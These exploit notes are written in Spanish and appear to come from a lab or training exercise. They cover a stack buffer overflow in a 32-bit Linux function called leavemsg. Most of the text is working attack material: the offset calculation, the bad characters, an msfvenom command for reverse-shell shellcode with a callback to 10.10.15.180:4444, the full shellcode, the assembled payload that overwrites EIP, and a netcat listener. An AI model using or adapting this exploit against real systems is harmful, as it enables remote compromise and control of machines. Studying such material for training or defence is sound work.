- Direcci칩n leavmsg = 0x00000778

- Nombre funci칩n vulnerable = leavemsg

- Ataque b치sico = run $(python3 -c "print('\x55' * 20000)")

- Direcci칩n de retorno: 0x37714336

Exact match at offset 2060

Dirty payload size = 68

Dirty payload size (with extras) = 120

NOPS = 100

Buffer fill = (2064 - 120 - 100 - 4) = 1840

Dirty payload = run $(python3 -c "print('\x55' * 1840 + '\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x0a\x0f\xb4\x68\x02\x00\x1f\x90\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90' * 100 + '\x56' * 4)")

Bad chars = "\x00\x09\x0a\x20"

Clean payload size = 95

Examine memory = x/2000xb $esp+2200

msfvenom -p linux/x86/shell_reverse_tcp lhost=10.10.15.180 lport=4444 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out cleanPayload.txt

Clean payload = \xda\xdd\xd9\x74\x24\xf4\xba\xd0\x2f\xa2\x2b\x5e\x31\xc9\xb1\x12\x31\x56\x17\x83\xee\xfc\x03\x86\x3c\x40\xde\x17\x98\x73\xc2\x04\x5d\x2f\x6f\xa8\xe8\x2e\xdf\xca\x27\x30\xb3\x4b\x08\x0e\x79\xeb\x21\x08\x78\x83\xbb\xe0\x75\xe7\xd4\xf6\x89\x16\x79\x7e\x68\xa8\xe7\xd0\x3a\x9b\x54\xd3\x35\xfa\x56\x54\x17\x94\x06\x7a\xeb\x0c\xbf\xab\x24\xae\x56\x3d\xd9\x7c\xfa\xb4\xff\x30\xf7\x0b\x7f

Execution = run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x55' * (2064 - 100 - 95 - 4) + b'\x90' * 100 + b'\xda\xdd\xd9\x74\x24\xf4\xba\xd0\x2f\xa2\x2b\x5e\x31\xc9\xb1\x12\x31\x56\x17\x83\xee\xfc\x03\x86\x3c\x40\xde\x17\x98\x73\xc2\x04\x5d\x2f\x6f\xa8\xe8\x2e\xdf\xca\x27\x30\xb3\x4b\x08\x0e\x79\xeb\x21\x08\x78\x83\xbb\xe0\x75\xe7\xd4\xf6\x89\x16\x79\x7e\x68\xa8\xe7\xd0\x3a\x9b\x54\xd3\x35\xfa\x56\x54\x17\x94\x06\x7a\xeb\x0c\xbf\xab\x24\xae\x56\x3d\xd9\x7c\xfa\xb4\xff\x30\xf7\x0b\x7f' + b'\x66' * 4)")

eip destination = 0xffffd640

Final result (hopefully) = run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x55' * (2064 - 100 - 95 - 4) + b'\x90' * 100 + b'\xda\xdd\xd9\x74\x24\xf4\xba\xd0\x2f\xa2\x2b\x5e\x31\xc9\xb1\x12\x31\x56\x17\x83\xee\xfc\x03\x86\x3c\x40\xde\x17\x98\x73\xc2\x04\x5d\x2f\x6f\xa8\xe8\x2e\xdf\xca\x27\x30\xb3\x4b\x08\x0e\x79\xeb\x21\x08\x78\x83\xbb\xe0\x75\xe7\xd4\xf6\x89\x16\x79\x7e\x68\xa8\xe7\xd0\x3a\x9b\x54\xd3\x35\xfa\x56\x54\x17\x94\x06\x7a\xeb\x0c\xbf\xab\x24\xae\x56\x3d\xd9\x7c\xfa\xb4\xff\x30\xf7\x0b\x7f' + b'\x40\xd6\xff\xff')")

Passive listen = nc -nlvp 4444

